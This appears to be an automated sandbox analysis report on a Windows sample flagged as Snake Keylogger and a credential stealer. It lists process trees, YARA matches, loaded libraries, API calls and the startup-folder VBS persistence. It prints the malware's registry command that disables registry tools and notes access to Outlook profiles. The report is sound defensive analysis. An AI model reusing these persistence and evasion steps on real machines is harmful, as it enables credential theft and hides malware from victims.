Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: String function: 007E0AE3 appears 70 times
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: String function: 007E8900 appears 42 times

Source: tNXl4XhgmV.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.vaccinatory.exe.36b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.vaccinatory.exe.36b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.vaccinatory.exe.36b0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.vaccinatory.exe.36b0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.vaccinatory.exe.9e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.vaccinatory.exe.9e0000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.vaccinatory.exe.9e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.vaccinatory.exe.9e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: vaccinatory.exe PID: 7700, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: vaccinatory.exe PID: 8052, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@16/6@2/2

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001EA06A GetLastError,FormatMessageW,

1_2_001EA06A

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001D81CB AdjustTokenPrivileges,CloseHandle,	1_2_001D81CB
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001D87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	1_2_001D87E1
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_008181CB AdjustTokenPrivileges,CloseHandle,	3_2_008181CB
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_008187E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	3_2_008187E1

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001EB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

1_2_001EB333

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001FEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

1_2_001FEE0D

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001EC397 CoInitialize,CoCreateInstance,CoUninitialize,

1_2_001EC397

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_00184E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_00184E89

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

File created: C:\Users\user\AppData\Local\ghauts

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

File created: C:\Users\user~1\AppData\Local\Temp\aut38CE.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs"

Source: tNXl4XhgmV.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000004.00000002.2538888760.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2538888760.0000000002EDF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2538888760.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2538888760.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2538888760.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002E24000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2539476037.0000000003D3D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.2538612035.0000000002E30000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: tNXl4XhgmV.exe	Virustotal: Detection: 48%
Source: tNXl4XhgmV.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

File read: C:\Users\user\Desktop\tNXl4XhgmV.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\tNXl4XhgmV.exe "C:\Users\user\Desktop\tNXl4XhgmV.exe"
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Process created: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe "C:\Users\user\Desktop\tNXl4XhgmV.exe"
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\tNXl4XhgmV.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe "C:\Users\user\AppData\Local\ghauts\vaccinatory.exe"
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\ghauts\vaccinatory.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Process created: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe "C:\Users\user\Desktop\tNXl4XhgmV.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\tNXl4XhgmV.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe "C:\Users\user\AppData\Local\ghauts\vaccinatory.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\ghauts\vaccinatory.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: tNXl4XhgmV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: tNXl4XhgmV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: tNXl4XhgmV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: tNXl4XhgmV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: tNXl4XhgmV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: tNXl4XhgmV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: tNXl4XhgmV.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: vaccinatory.exe, 00000003.00000003.1309242828.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000003.00000003.1310335375.0000000003920000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000009.00000003.1422258866.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000009.00000003.1420731175.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: vaccinatory.exe, 00000003.00000003.1309242828.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000003.00000003.1310335375.0000000003920000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000009.00000003.1422258866.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000009.00000003.1420731175.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp

Source: tNXl4XhgmV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: tNXl4XhgmV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: tNXl4XhgmV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: tNXl4XhgmV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: tNXl4XhgmV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_00184B37 LoadLibraryA,GetProcAddress,

1_2_00184B37

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_0018C4C7 push A30018BAh; retn 0018h	1_2_0018C50D
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001A8945 push ecx; ret	1_2_001A8958
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007E8945 push ecx; ret	3_2_007E8958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01319C08 push esp; iretd	4_2_01319C19

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: reg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: reg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

File created: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs

Jump to behavior

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	1_2_001848D7
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_00205376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	1_2_00205376
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_007C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	3_2_007C48D7
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_00845376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	3_2_00845376

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

